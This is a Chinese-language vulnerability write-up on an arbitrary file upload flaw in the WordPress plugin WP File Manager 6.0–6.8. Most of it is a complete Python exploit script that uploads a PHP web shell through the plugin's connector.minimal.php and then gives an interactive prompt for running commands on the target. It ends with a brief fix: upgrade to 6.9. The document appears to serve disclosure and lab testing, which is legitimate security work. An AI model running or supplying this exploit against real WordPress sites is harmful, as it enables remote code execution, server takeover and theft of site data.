0x00 简介
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。
文件管理器允许您直接从WordPress后端编辑,删除,上载,下载,压缩,复制和粘贴文件和文件夹。不必费心使用FTP来管理文件和从一个位置移动文件。有史以来功能最强大,最灵活,最简单的WordPress文件管理解决方案!
0x01 漏洞概述
安全人员进行调查时,很快发现WordPress插件WP File Manager中存在一个严重的0day安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程执行代码。
攻击者可能会做任何他们选择采取的行动–窃取私人数据,破坏站点或使用该网站对其他站点或基础结构进行进一步的攻击。
0x02 影响版本
WP File Manager 6.0—6.8
0x03 环境搭建
Wordpress 5.4.1
https://cn.wordpress.org/wordpress-5.4.1-zh_CN.tar.gz
wp-file-manager 6.0
https://wwe.lanzous.com/iN0A7hafg4h
0x04 漏洞利用
使用Python脚本,如果用的python2,记得把input改成raw_input
#!/usr/bin/python3
# -*- coding: UTF-8 -*-
"""
@Author : xDroid
@File : wp.py
@Time : 2020/9/21
"""
import requests
requests.packages.urllib3.disable_warnings()
from hashlib import md5
import random
import json
import optparse
import sys
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
ENDC = '\033[0m'
proxies={ 'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080' }
def randmd5():
new_md5 = md5()
new_md5.update(str(random.randint(1, 1000)).encode())
return new_md5.hexdigest()[:6]+'.php'
def file_manager(url):
if not url:
print('#Usage : python3 file_manager_upload.py -u http://127.0.0.1')
sys.exit()
vuln_url=url.strip()+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"
filename=randmd5()
headers={
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0',
'Content-Type':'multipart/form-data;boundary=---------------------------42474892822150178483835528074'
}
data="-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n1744f7298611ba\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"%s\"\r\nContent-Type: application/php\r\n\r\n<?php system($_GET['cmd']); ?>\r\n-----------------------------42474892822150178483835528074\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1597850374\r\n-----------------------------42474892822150178483835528074--\r\n"%filename
try:
resp=requests.post(url=vuln_url,headers=headers,data=data,timeout=3, verify=False,proxies=proxies)
result = json.loads(resp.text)
if filename == result['added'][0]['url'].split('/')[-1]:
print(GREEN+'[+]\t\t'+ENDC+YELLOW+'File Uploaded Success\t\t'+ENDC)
while(True):
command = input("请输入执行的命令:")
if "q" == command:
sys.exit()
exec_url = url+'/wp-content/plugins/wp-file-manager/lib/files/'+filename+'?cmd='+command.strip()
exec_resp = requests.get(url=exec_url)
exec_resp.encoding='gb2312'
print(exec_resp.text)
else:
print(RED+'[-]\t\tUploaded failed\t\t'+ENDC)
except Exception as e:
print(RED + '[-]\t\tUploaded failed\t\t' + ENDC)
if __name__ == '__main__':
banner = GREEN+'''
__ _ _
/ _(_) | ___ _ __ ___ __ _ _ __ __ _ __ _ ___ _ __
| |_| | |/ _ \ | '_ ` _ \ / _` | '_ \ / _` |/ _` |/ _ \ '__|
| _| | | __/ | | | | | | (_| | | | | (_| | (_| | __/ |
|_| |_|_|\___| |_| |_| |_|\__,_|_| |_|\__,_|\__, |\___|_|
|___/
by: Timeline Sec
file manager 6.0-6.8 file upload
'''+ENDC
print(banner)
parser = optparse.OptionParser('python3 %prog' + '-h')
parser.add_option('-u', dest='url', type='str', help='wordpress url')
(options, args) = parser.parse_args()
file_manager(options.url)
0x05 修复方式
WP File Manager升级到6.9版本
参考: